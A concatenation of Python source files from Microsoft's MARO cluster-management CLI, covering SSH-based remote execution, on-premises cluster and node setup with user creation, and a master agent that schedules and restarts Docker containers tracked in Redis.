f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.load_node_agent_service "
f"{self.cluster_name} {node_name}'"
)
_ = SubProcess.run(command)
def remote_create_pending_job_ticket(self, job_name: str):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.create_pending_job_ticket "
f"{self.cluster_name} {job_name}'"
)
_ = SubProcess.run(command)
def remote_create_job_details(self, job_name: str):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.create_job_details "
f"{self.cluster_name} {job_name}'"
)
_ = SubProcess.run(command)
def remote_create_killed_job_ticket(self, job_name: str):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.create_killed_job_ticket "
f"{self.cluster_name} {job_name}'"
)
_ = SubProcess.run(command)
def remote_delete_pending_job_ticket(self, job_name: str):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.delete_pending_job_ticket "
f"{self.cluster_name} {job_name}'"
)
_ = SubProcess.run(command)
def remote_set_master_details(self, master_details: dict):
master_details_b64 = base64.b64encode(json.dumps(master_details).encode("utf8")).decode('utf8')
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.set_master_details "
f"{self.cluster_name} {master_details_b64}'"
)
_ = SubProcess.run(command)
def remote_set_node_details(self, node_name: str, node_details: dict):
node_details_b64 = base64.b64encode(json.dumps(node_details).encode("utf8")).decode('utf8')
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.set_node_details "
f"{self.cluster_name} {node_name} {node_details_b64}'"
)
_ = SubProcess.run(command)
def remote_update_image_files_details(self):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.update_image_files_details "
f"{self.cluster_name}'"
)
_ = SubProcess.run(command)
def remote_update_node_status(self, node_name: str, action: str):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.update_node_status "
f"{self.cluster_name} {node_name} {action}'"
)
_ = SubProcess.run(command)
def test_ssh_22_connection(self, node_ip_address: str):
command = (
f"ssh -o StrictHostKeyChecking=no {self.admin_username}@{node_ip_address} "
"echo 'Connection established'"
)
_ = SubProcess.run(command=command, timeout=5)
def test_ssh_default_port_connection(self, node_ip_address: str):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} {self.admin_username}@{node_ip_address} "
"echo 'Connection established'"
)
_ = SubProcess.run(command=command, timeout=5)
def remote_set_ssh_port(self, node_ip_address: str):
# Don't have to do the setting if it is assigned 22
if self.ssh_port == 22:
return
# Set ssh port.
command = (
f"ssh -o StrictHostKeyChecking=no {self.admin_username}@{node_ip_address} "
f"'echo -e \"Port {self.ssh_port}\nPort 22\" | sudo tee -a /etc/ssh/sshd_config'"
)
_ = SubProcess.run(command)
# Restart sshd service.
command = (
f"ssh -o StrictHostKeyChecking=no {self.admin_username}@{node_ip_address} "
"'sudo systemctl restart ssh'"
)
_ = SubProcess.run(command)
def retry_connection_and_set_ssh_port(self, node_ip_address: str) -> bool:
remain_retries = 20
while remain_retries > 0:
try:
self.test_ssh_default_port_connection(node_ip_address=node_ip_address)
return True
except (CliError, TimeoutExpired):
remain_retries -= 1
logger.debug(
f"Unable to connect to {node_ip_address} with port {self.ssh_port}, "
f"remains {remain_retries} retries."
)
try:
self.test_ssh_22_connection(node_ip_address=node_ip_address)
self.remote_set_ssh_port(node_ip_address=node_ip_address)
return True
except (CliError, TimeoutExpired):
remain_retries -= 1
logger.debug(
f"Unable to connect to {node_ip_address} with port 22, remains {remain_retries} retries."
)
time.sleep(10)
raise ClusterInternalError(f"Unable to connect to {node_ip_address}.")
# Create a new user account on target OS.
@staticmethod
def remote_add_user_to_node(admin_username: str, maro_user: str, node_ip_address: str, pubkey: str):
# The admin_user is an already exist account which has privileges to create new account on target OS.
command = (
f"ssh {admin_username}@{node_ip_address} 'sudo python3 ~/create_user.py {maro_user} \"{pubkey}\"'"
)
_ = SubProcess.run(command)
# Delete maro cluster user account on target OS.
@staticmethod
def remote_delete_user_from_node(admin_username: str, delete_user: str, node_ip_address: str):
# The admin_user is an already exist account which has privileges to create new account on target OS.
command = (
f"ssh {admin_username}@{node_ip_address} 'sudo python3 ~/delete_user.py {delete_user}'"
)
_ = SubProcess.run(command)
def delete_master_details(self, cluster_name: str):
command = (
"ssh -o StrictHostKeyChecking=no "
f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.delete_master_details "
f"{self.cluster_name} '"
)
_ = SubProcess.run(command)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import secrets
import string
from shutil import rmtree
import yaml
from maro.cli.grass.executors.grass_executor import GrassExecutor
from maro.cli.grass.utils.copy import copy_files_to_node
from maro.cli.utils.details import (load_cluster_details, save_cluster_details)
from maro.cli.utils.naming import generate_cluster_id
from maro.cli.utils.params import GlobalParams, GlobalPaths
from maro.cli.utils.validation import validate_and_fill_dict
from maro.utils.exception.cli_exception import CliError
from maro.utils.logger import CliLogger
logger = CliLogger(name=__name__)
class GrassOnPremisesExecutor:
def __init__(self, cluster_name: str):
self.cluster_name = cluster_name
self.cluster_details = load_cluster_details(cluster_name=cluster_name)
self.grass_executor = GrassExecutor(cluster_details=self.cluster_details)
@staticmethod
def build_cluster_details(create_deployment: dict):
# Standardize create deployment
GrassOnPremisesExecutor._standardize_create_deployment(create_deployment=create_deployment)
# Create user account
logger.info("Now is going to create an user account for maro cluster node.")
if "super_user" in create_deployment["user"]:
super_user = create_deployment["user"]["super_user"]
else:
super_user = ""
GrassOnPremisesExecutor.create_user(
admin_username=super_user,
maro_user=create_deployment["user"]["admin_username"],
ip_address=create_deployment["master"]["public_ip_address"],
pubkey=create_deployment["user"]["admin_public_key"],
ssh_port=create_deployment["connection"]["ssh"]["port"]
)
# Get cluster name and save details
cluster_name = create_deployment["name"]
if os.path.isdir(os.path.expanduser(f"{GlobalPaths.MARO_CLUSTERS}/{cluster_name}")):
raise CliError(f"Cluster {cluster_name} already exist.")
os.makedirs(os.path.expanduser(f"{GlobalPaths.MARO_CLUSTERS}/{cluster_name}"))
save_cluster_details(
cluster_name=cluster_name,
cluster_details=create_deployment
)
@staticmethod
def _standardize_create_deployment(create_deployment: dict):
alphabet = string.ascii_letters + string.digits
optional_key_to_value = {
"root['master']['redis']": {'port': 6379},
"root['master']['redis']['port']": 6379,
"root['master']['fluentd']": {'port': 24224},
"root['master']['fluentd']['port']": 24224,
"root['master']['samba']": {'password': ''.join(secrets.choice(alphabet) for _ in range(20))},
"root['master']['samba']['password']": ''.join(secrets.choice(alphabet) for _ in range(20)),
"root['connection']": {"ssh": {"port": GlobalParams.DEFAULT_SSH_PORT}},
"root['connection']['ssh']": {"port": GlobalParams.DEFAULT_SSH_PORT},
"root['connection']['ssh']['port']": GlobalParams.DEFAULT_SSH_PORT
}
with open(
os.path.expanduser(
f"{GlobalPaths.MARO_GRASS_LIB}/deployments/internal/grass-on-premises-create.yml")) as fr:
create_deployment_template = yaml.safe_load(fr)
validate_and_fill_dict(
template_dict=create_deployment_template,
actual_dict=create_deployment,
optional_key_to_value=optional_key_to_value
)
def create(self):
logger.info("Creating cluster")
# Start creating
try:
self._set_cluster_id()
self._set_master_info()
self._init_master()
except Exception as e:
# If failed, remove details folder, then raise
rmtree(os.path.expanduser(f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}"))
raise CliError(f"Failure to create cluster, due to {e}")
logger.info_green(f"Cluster {self.cluster_name} has been created.")
def _set_cluster_id(self):
# Load details
cluster_details = self.cluster_details
# Set cluster id
cluster_details["id"] = generate_cluster_id()
# Save details
save_cluster_details(
cluster_name=self.cluster_name,
cluster_details=cluster_details
)
def _create_path_in_list(self, target_ip: str, path_list):
for path_to_create in path_list:
self.grass_executor.remote_mkdir(
path=path_to_create,
node_ip_address=target_ip
)
def _set_master_info(self):
# Load details
cluster_details = self.cluster_details
cluster_id = cluster_details["id"]
master_details = cluster_details["master"]
hostname = cluster_details["master"]["public_ip_address"]
master_details["private_ip_address"] = cluster_details["master"]["public_ip_address"]
master_details["hostname"] = hostname
master_details["resource_name"] = f"{cluster_id}-master-vm"
admin_username = cluster_details["user"]["admin_username"]
public_ip_address = cluster_details["master"]["public_ip_address"]
logger.info_green(f"You can login to your master node with: ssh {admin_username}@{public_ip_address}")
def _init_master(self):
logger.info("Initializing master node")
# Load details
cluster_details = self.cluster_details
master_details = cluster_details["master"]
admin_username = cluster_details["user"]["admin_username"]
master_public_ip_address = cluster_details["master"]["public_ip_address"]
ssh_port = cluster_details["connection"]["ssh"]["port"]
# Make sure master is able to connect
self.grass_executor.retry_connection_and_set_ssh_port(node_ip_address=master_public_ip_address)
# Create folders
path_list = {
GlobalPaths.MARO_GRASS_LIB,
f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}",
f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/data",
f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/images",
f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/jobs",
f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/schedules"
}
self._create_path_in_list(master_public_ip_address, path_list)
# Copy required files
copy_files_to_node(
local_path=GlobalPaths.MARO_GRASS_LIB,
remote_dir=GlobalPaths.MARO_LIB,
admin_username=admin_username, node_ip_address=master_public_ip_address, ssh_port=ssh_port
)
copy_files_to_node(
local_path=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}",
remote_dir=GlobalPaths.MARO_CLUSTERS,
admin_username=admin_username, node_ip_address=master_public_ip_address, ssh_port=ssh_port
)
# Get public key
public_key = self.grass_executor.remote_get_public_key(node_ip_address=master_public_ip_address)
# Remote init master
self.grass_executor.remote_init_master()
# Load master agent service
self.grass_executor.remote_load_master_agent_service()
# Save details
master_details["public_key"] = public_key
save_cluster_details(
cluster_name=self.cluster_name,
cluster_details=cluster_details
)
self.grass_executor.remote_set_master_details(master_details=cluster_details["master"])
logger.info_green("Master node is initialized")
def delete(self):
# Load details
cluster_name = self.cluster_name
logger.info(f"Deleting cluster {cluster_name}")
# Delete redis and other services
node_details_list = self.grass_executor.remote_get_nodes_details()
for node_name, node_details in node_details_list.items():
self.node_leave_cluster(node_name)
# Delete cluster folder
rmtree(os.path.expanduser(f"{GlobalPaths.MARO_CLUSTERS}/{cluster_name}"))
self.grass_executor.remote_clean(1)
self.grass_executor.delete_master_details(cluster_name)
logger.info_green(f"The cluster {cluster_name} has been deleted.")
def node_join_cluster(self, node_join_info: dict):
node_name = node_join_info["name"]
cluster_details = self.cluster_details
node_ip_address = node_join_info["public_ip_address"]
# Create user account
logger.info(f"Now is going to create an user account for maro working node {node_name}.")
if "super_user" in node_join_info:
super_user = node_join_info["super_user"]
else:
super_user = ""
GrassOnPremisesExecutor.create_user(
admin_username=super_user,
maro_user=cluster_details["user"]["admin_username"],
ip_address=node_ip_address,
pubkey=cluster_details["user"]["admin_public_key"],
ssh_port=cluster_details["connection"]["ssh"]["port"]
)
self._create_node_data(node_join_info)
self._init_node(node_name)
def _create_node_data(self, node_join_info: dict):
# Load details
cluster_details = self.cluster_details
cluster_id = cluster_details["id"]
node_name = node_join_info["name"]
node_ip_address = node_join_info["public_ip_address"]
# Get resources
cpu = node_join_info["resources"]["cpu"]
memory = node_join_info["resources"]["memory"]
gpu = node_join_info["resources"]["gpu"]
# Save details
node_details = {
"public_ip_address": node_ip_address,
"private_ip_address": node_ip_address,
"node_size": "",
"resource_name": f"{cluster_id}-{node_name}-vm",
"hostname": f"{cluster_id}-{node_name}-vm",
"resources": {
"cpu": cpu,
"memory": memory,
"gpu": gpu
},
"containers": {}
}
self.grass_executor.remote_set_node_details(
node_name=node_name,
node_details=node_details,
)
def _init_node(self, node_name: str):
logger.info(f"Initiating node {node_name}.")
# Load details
cluster_details = self.cluster_details
admin_username = cluster_details["user"]["admin_username"]
node_details = self.grass_executor.remote_get_node_details(node_name=node_name)
node_public_ip_address = node_details["public_ip_address"]
ssh_port = cluster_details["connection"]["ssh"]["port"]
# Make sure the node is able to connect
self.grass_executor.retry_connection_and_set_ssh_port(node_ip_address=node_public_ip_address)
# Create folders
path_list = {
GlobalPaths.MARO_GRASS_LIB,
f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}",
f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/data",
f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/images",
f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/jobs",
f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/schedules"
}
self._create_path_in_list(node_public_ip_address, path_list)
# Copy required files
copy_files_to_node(
local_path=GlobalPaths.MARO_GRASS_LIB,
remote_dir=GlobalPaths.MARO_LIB,
admin_username=admin_username, node_ip_address=node_public_ip_address, ssh_port=ssh_port
)
copy_files_to_node(
local_path=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}",
remote_dir=GlobalPaths.MARO_CLUSTERS,
admin_username=admin_username, node_ip_address=node_public_ip_address, ssh_port=ssh_port
)
# Remote init node
self.grass_executor.remote_init_node(
node_name=node_name,
node_ip_address=node_public_ip_address
)
# Get public key
public_key = self.grass_executor.remote_get_public_key(node_ip_address=node_public_ip_address)
# Save details
node_details["public_key"] = public_key
self.grass_executor.remote_set_node_details(
node_name=node_name,
node_details=node_details
)
# Update node status
# Since On-Premises machines don't need to shutdown, it will be set to start directly.
self.grass_executor.remote_update_node_status(
node_name=node_name,
action="start"
)
# Load images
self.grass_executor.remote_load_images(
node_name=node_name,
parallels=GlobalParams.PARALLELS,
node_ip_address=node_public_ip_address
)
# Load node agent service
self.grass_executor.remote_load_node_agent_service(
node_name=node_name,
node_ip_address=node_public_ip_address
)
logger.info_green(f"Node {node_name} has been initialized.")
def node_leave_cluster(self, node_name: str):
cluster_details = self.cluster_details
nodes_details = self.grass_executor.remote_get_nodes_details()
if node_name not in nodes_details:
logger.warning(f"The specified node cannot be found in cluster {cluster_details['name']}.")
return
node_details = nodes_details[node_name]
# Update node status
self.grass_executor.remote_update_node_status(
node_name=node_name,
action="stop"
)
# Delete node record in redis.
self.grass_executor.remote_update_node_status(node_name, "delete")
admin_username = cluster_details["user"]["admin_username"]
node_ip_address = node_details["public_ip_address"]
ssh_port = cluster_details["connection"]["ssh"]["port"]
GrassOnPremisesExecutor.delete_user(
admin_username="",
maro_user=admin_username,
ip_address=node_ip_address,
ssh_port=ssh_port
)
logger.info_green(f"The node {node_name} has been left cluster {cluster_details['name']}.")
@staticmethod
def create_user(admin_username: str, maro_user: str, ip_address: str, pubkey: str, ssh_port: int) -> None:
if "" == admin_username:
print("Please input a user account that has permissions to create user:")
admin_username = input("> ")
copy_files_to_node(
local_path=f"{GlobalPaths.MARO_GRASS_LIB}/scripts/create_user.py",
remote_dir="~/",
admin_username=admin_username, node_ip_address=ip_address, ssh_port=ssh_port
)
GrassExecutor.remote_add_user_to_node(admin_username, maro_user, ip_address, pubkey)
@staticmethod
def delete_user(admin_username: str, maro_user: str, ip_address: str, ssh_port: int) -> None:
if "" == admin_username:
admin_username = input("Please input a user account that has permissions to delete user:\r\n")
copy_files_to_node(
local_path=f"{GlobalPaths.MARO_GRASS_LIB}/scripts/delete_user.py",
remote_dir="~/",
admin_username=admin_username, node_ip_address=ip_address, ssh_port=ssh_port
)
GrassExecutor.remote_delete_user_from_node(admin_username, maro_user, ip_address)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from maro.cli.grass.executors.grass_azure_executor import GrassAzureExecutor
from maro.cli.utils.checkers import check_details_validity
from maro.cli.utils.details import load_cluster_details
from maro.cli.utils.lock import lock
from maro.utils.exception.cli_exception import BadRequestError
@check_details_validity
@lock
def push_image(
cluster_name: str, image_name: str, image_path: str, remote_context_path: str, remote_image_name: str,
**kwargs
):
cluster_details = load_cluster_details(cluster_name=cluster_name)
if cluster_details["mode"] in ["grass/azure", "grass/on-premises"]:
executor = GrassAzureExecutor(cluster_name=cluster_name)
executor.push_image(
image_name=image_name,
image_path=image_path,
remote_context_path=remote_context_path,
remote_image_name=remote_image_name
)
else:
raise BadRequestError(f"Unsupported command in mode '{cluster_details['mode']}'.")
--- FILE SEPARATOR ---
class AllocationFailed(Exception):
pass
class StartContainerFailed(Exception):
pass
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import heapq
import json
import logging
import multiprocessing
import os
import subprocess
import sys
import time
import uuid
from redis import Redis
from .exception import AllocationFailed, StartContainerFailed
from .resource import ContainerResource, NodeResource
from .utils import (
delete_rejoin_container_name_to_component_name, get_containers_details, get_job_details, get_job_runtime_details,
get_jobs_details, get_killed_job_tickets, get_node_details, get_nodes_details, get_pending_job_tickets,
get_rejoin_component_restart_times, get_rejoin_container_name_to_component_name,
incr_rejoin_component_restart_times, load_cluster_details, remove_killed_job_ticket, remove_pending_job_ticket,
set_containers_details, set_job_details
)
logger = logging.getLogger(__name__)
START_CONTAINER_COMMAND = (
"ssh -o StrictHostKeyChecking=no -p {ssh_port} {admin_username}@{node_hostname} "
"docker run "
"-it -d "
"--cpus {cpu} "
"-m {memory} "
"--name {container_name} "
"--network host "
"--log-driver=fluentd "
"--log-opt tag=maro.job_id.{job_id}.container_name.{container_name} "
"--log-opt fluentd-address={master_hostname}:{fluentd_port} "
"-v {mount_source}:{mount_target} "
"{environment_parameters} {labels} "
"{image_name} {command}"
)
START_CONTAINER_WITH_GPU_COMMAND = (
"ssh -o StrictHostKeyChecking=no -p {ssh_port} {admin_username}@{node_hostname} "
"docker run "
"-it -d "
"--cpus {cpu} "
"-m {memory} "
"--gpus {gpu} "
"--name {container_name} "
"--network host "
"--log-driver=fluentd "
"--log-opt tag=maro.job_id.{job_id}.container_name.{container_name} "
"--log-opt fluentd-address={master_hostname}:{fluentd_port} "
"-v {mount_source}:{mount_target} "
"{environment_parameters} {labels} "
"{image_name} {command}"
)
REMOVE_CONTAINER_COMMAND = (
"ssh -o StrictHostKeyChecking=no -p {ssh_port} {admin_username}@{node_hostname} "
"docker rm -f {containers}"
)
STOP_CONTAINER_COMMAND = (
"ssh -o StrictHostKeyChecking=no -p {ssh_port} {admin_username}@{node_hostname} "
"docker stop {containers}"
)
AVAILABLE_METRICS = {
"cpu",
"memory",
"gpu"
}
ERROR_CODE_FOR_NOT_RESTART = 64
ERROR_CODE_FOR_STOP_JOB = 65
ERROR_CODES_FOR_NOT_RESTART_CONTAINER = {
0, ERROR_CODE_FOR_NOT_RESTART, ERROR_CODE_FOR_STOP_JOB
}
class MasterAgent:
def __init__(self, cluster_name: str):
self._cluster_name = cluster_name
self._cluster_details = load_cluster_details(cluster_name=cluster_name)
def start(self) -> None:
"""Start agents.
Returns:
None.
"""
job_tracking_agent = JobTrackingAgent(cluster_details=self._cluster_details)
job_tracking_agent.start()
container_tracking_agent = ContainerTrackingAgent(cluster_details=self._cluster_details)
container_tracking_agent.start()
pending_job_agent = PendingJobAgent(cluster_details=self._cluster_details)
pending_job_agent.start()
container_runtime_agent = ContainerRuntimeAgent(cluster_details=self._cluster_details)
container_runtime_agent.start()
killed_job_agent = KilledJobAgent(cluster_details=self._cluster_details)
killed_job_agent.start()
class JobTrackingAgent(multiprocessing.Process):
def __init__(self, cluster_details: dict, check_interval: int = 5):
super().__init__()
self._cluster_details = cluster_details
self._cluster_name = cluster_details["name"]
self._redis = Redis(
host="localhost",
port=cluster_details["master"]["redis"]["port"],
charset="utf-8", decode_responses=True
)
self._check_interval = check_interval
def run(self) -> None:
"""Start updating jobs_details.
Returns:
None.
"""
while True:
self._update_jobs_details()
time.sleep(self._check_interval)
def _update_jobs_details(self) -> None:
"""Update jobs_details with containers_details.
Returns:
None.
"""
# Get details and mapping.
containers_details = get_containers_details(
redis=self._redis,
cluster_name=self._cluster_name
)
jobs_details = get_jobs_details(
redis=self._redis,
cluster_name=self._cluster_name
)
job_id_to_job_name = self._get_job_id_to_job_name(jobs_details=jobs_details)
# Iterate nodes details.
for container_name, container_details in containers_details.items():
curr_job_id = container_details["job_id"]
if curr_job_id in job_id_to_job_name:
curr_job_name = job_id_to_job_name[curr_job_id]
jobs_details[curr_job_name]["containers"][container_name] = container_details
else:
logger.warning(f"Job Id {curr_job_id} is not found")
# Save jobs details.
for job_name, job_details in jobs_details.items():
job_details["check_time"] = self._redis.time()[0]
set_job_details(
redis=self._redis,
cluster_name=self._cluster_name,
job_name=job_name,
job_details=job_details
)
# Utils.
@staticmethod
def _get_job_id_to_job_name(jobs_details: dict) -> dict:
"""Get job_id_to_job_name mapping from jobs_details.
Args:
jobs_details: Details of the jobs.
Returns:
dict[int, str]: job_id_to_job_name mapping.
"""
job_id_to_job_name = {}
for job_name, job_details in jobs_details.items():
job_id_to_job_name[job_details["id"]] = job_name
return job_id_to_job_name
class ContainerTrackingAgent(multiprocessing.Process):
def __init__(self, cluster_details: dict, check_interval: int = 5):
super().__init__()
self._cluster_details = cluster_details
self._cluster_name = cluster_details["name"]
self._redis = Redis(
host="localhost",
port=cluster_details["master"]["redis"]["port"],
charset="utf-8", decode_responses=True
)
self._check_interval = check_interval
def run(self) -> None:
"""Start updating containers_details.
Returns:
None.
"""
while True:
self._update_containers_details()
time.sleep(self._check_interval)
def _update_containers_details(self) -> None:
"""Update containers_details with nodes_details.
Returns:
None.
"""
# Get details and init params.
nodes_details = get_nodes_details(redis=self._redis, cluster_name=self._cluster_name)
containers_details = {}
# Iterate node_details.
for _, node_details in nodes_details.items():
containers_details.update(node_details["containers"])
# Save containers_details.
set_containers_details(
redis=self._redis,
cluster_name=self._cluster_name,
containers_details=containers_details
)
class ContainerRuntimeAgent(multiprocessing.Process):
def __init__(self, cluster_details: dict, check_interval: int = 5):
super().__init__()
self._cluster_name = cluster_details["name"]
self._cluster_id = cluster_details["id"]
self._admin_username = cluster_details["user"]["admin_username"]
self._fluentd_port = cluster_details["master"]["fluentd"]["port"]
self._ssh_port = cluster_details["connection"]["ssh"]["port"]
self._master_hostname = cluster_details["master"]["hostname"]
self._redis = Redis(
host="localhost",
port=cluster_details["master"]["redis"]["port"],
charset="utf-8", decode_responses=True
)
self._check_interval = check_interval
def run(self) -> None:
"""Start tracking exited containers.
Returns:
None.
"""
while True:
self._iterate_container_status()
time.sleep(self._check_interval)
def _iterate_container_status(self) -> None:
"""Iterate container status.
Find the exited container and try to restart it if the rule exists.
Returns:
None.
"""
# Get details.
containers_details = get_containers_details(
redis=self._redis,
cluster_name=self._cluster_name
)
# Iterate container status.
for container_name, container_details in containers_details.items():
# Get job_runtime_details and flags.
job_runtime_details = get_job_runtime_details(
redis=self._redis,
job_id=container_details["job_id"]
)
# Remove container.
is_remove_container = self._is_remove_container(
container_details=container_details,
job_runtime_details=job_runtime_details
)
if is_remove_container:
self._remove_container(container_name=container_name, container_details=container_details)
# Restart container.
if self._is_restart_container(
container_details=container_details,
job_runtime_details=job_runtime_details
):
self._restart_container(container_name=container_name, container_details=container_details)
# Stop job.
if self._is_stop_job(container_details=container_details):
self._stop_job(job_id=container_details["job_id"], is_remove_container=is_remove_container)
@staticmethod
def _is_remove_container(container_details: dict, job_runtime_details: dict) -> bool:
"""Check if the container need to be removed.
Args:
container_details (dict): Details of the container.
job_runtime_details (dict): Runtime details of the job.
Returns:
bool: True or False.
"""
return (
container_details["state"]["Status"] == "exited"
and job_runtime_details is not None
and job_runtime_details.get("is_remove_failed_container") == "1"
)
def _is_restart_container(self, container_details: dict, job_runtime_details: dict) -> bool:
"""Check if the container need to be removed.
Args:
container_details (dict): Details of the container.
job_runtime_details (dict): Runtime details of the job.
Returns:
bool: True or False.
"""
exceed_maximum_restart_times = get_rejoin_component_restart_times(
self._redis,
job_id=container_details["job_id"],
component_id=container_details["component_id"]
) >= int(job_runtime_details.get("rejoin:max_restart_times", sys.maxsize))
return (
container_details["state"]["Status"] == "exited"
and container_details["state"]["ExitCode"] not in ERROR_CODES_FOR_NOT_RESTART_CONTAINER
and job_runtime_details is not None
and job_runtime_details.get("rejoin:enable") == "1"
and not exceed_maximum_restart_times
)
@staticmethod
def _is_stop_job(container_details: dict) -> bool:
"""Check if the job need to be stop.
Args:
container_details (dict): Details of the container.
Returns:
bool: True of False.
"""
return (
container_details["state"]["Status"] == "exited"
and container_details["state"]["ExitCode"] == ERROR_CODE_FOR_STOP_JOB
)
def _restart_container(self, container_name: str, container_details: dict) -> None:
"""Restart container.
Args:
container_name (str): Name of the exited container.
container_details (dict): Details of the exited container.
Returns:
None.
"""
# Get component_name_to_container_name.
rejoin_container_name_to_component_name = get_rejoin_container_name_to_component_name(
redis=self._redis,
job_id=container_details["job_id"]
)
# If the mapping not exists, or the container is not in the mapping, skip the restart operation.
if (
rejoin_container_name_to_component_name is None or
container_name not in rejoin_container_name_to_component_name
):
logger.warning(f"Container {container_name} is not found in container_name_to_component_name mapping")
return
else:
try:
# Get params.
component_name = rejoin_container_name_to_component_name[container_name]
# Get resources and allocation plan.
free_resources = ResourceManagementExecutor.get_free_resources(
redis=self._redis,
cluster_name=self._cluster_name
)
required_resources = [
ContainerResource(
container_name=ResourceManagementExecutor.build_container_name(
job_id=container_details["job_id"],
component_id=container_details["component_id"],
component_index=container_details["component_index"]
),
cpu=float(container_details["cpu"]),
memory=float(container_details["memory"].replace("m", "")),
gpu=float(container_details["gpu"])
)
]
allocation_plan = ResourceManagementExecutor.get_single_metric_balanced_allocation_plan(
allocation_details={"metric": "cpu"},
required_resources=required_resources,
free_resources=free_resources
)
# Start a new container.
job_details = get_job_details(
redis=self._redis,
cluster_name=self._cluster_name,
job_name=container_details["job_name"]
)
for container_name, node_name in allocation_plan.items():
node_details = get_node_details(
redis=self._redis,
cluster_name=self._cluster_name,
node_name=node_name
)
self._start_container(
container_name=container_name,
node_details=node_details,
job_details=job_details,
component_name=component_name
)
incr_rejoin_component_restart_times(
redis=self._redis,
job_id=container_details["job_id"],
component_id=container_details["component_id"]
)
except AllocationFailed as e:
logger.warning(f"Allocation failed with {e}")
except StartContainerFailed as e:
logger.warning(f"Start container failed with {e}")
def _remove_container(self, container_name: str, container_details: dict) -> None:
"""Remove container.
Args:
container_name (str): Name of the container.
container_details (dict): Details of the container.
Returns:
None.
"""
# Get details and params.
node_name = container_details["node_name"]
node_details = get_node_details(
redis=self._redis,
cluster_name=self._cluster_name,
node_name=node_name
)
# Load and exec command.
command = REMOVE_CONTAINER_COMMAND.format(
admin_username=self._admin_username,
node_hostname=node_details["hostname"],
containers=container_name,
ssh_port=self._ssh_port
)
completed_process = subprocess.run(
command,
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf8"
)
if completed_process.returncode != 0:
logger.error(f"No container {container_name} in {node_name}")
def _stop_job(self, job_id: str, is_remove_container: bool) -> None:
"""Stop job.
Args:
job_id (str): Id of the job.
is_remove_container (bool): If the containers need to be removed.
Returns:
None.
"""
# Delete mapping if fault tolerance is activated.
delete_rejoin_container_name_to_component_name(
redis=self._redis,
job_id=job_id
)
# Load details and vars.
nodes_details = get_nodes_details(
redis=self._redis,
cluster_name=self._cluster_name
)
# Delete containers.
for node_name, node_details in nodes_details.items():
# Load details.
container_details = node_details["containers"]
node_hostname = node_details["hostname"]
# Filter containers.
stoppable_containers = []
for container_name in container_details:
if container_name.startswith(job_id):
stoppable_containers.append(container_name)
# Stop containers.
if len(stoppable_containers) > 0:
if is_remove_container:
command = REMOVE_CONTAINER_COMMAND.format(
admin_username=self._admin_username,
node_hostname=node_hostname,
containers=" ".join(stoppable_containers),
ssh_port=self._ssh_port
)
else:
command = STOP_CONTAINER_COMMAND.format(
admin_username=self._admin_username,
node_hostname=node_hostname,
containers=" ".join(stoppable_containers),
ssh_port=self._ssh_port
)
completed_process = subprocess.run(
command,
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
encoding="utf8"
)
if completed_process.returncode != 0:
logger.error(completed_process.stderr)
logger.info(command)
def _start_container(self, container_name: str, node_details: dict, job_details: dict, component_name: str) -> None:
"""Start container.
Args:
container_name: Name of the container.
node_details: Details of the node.
job_details: Details of the job.
component_name: Name of the component from mapping.
Returns:
None.
"""
# Get mapping.
component_id_to_component_type = JobExecutor.get_component_id_to_component_type(job_details=job_details)
# Parse params.
cluster_name = self._cluster_name
cluster_id = self._cluster_id
node_id = node_details["id"]
node_name = node_details["name"]
job_id = job_details["id"]
job_name = job_details["name"]
component_id = container_name.split("-")[1]
component_index = container_name.split("-")[2]
component_type = component_id_to_component_type[component_id]
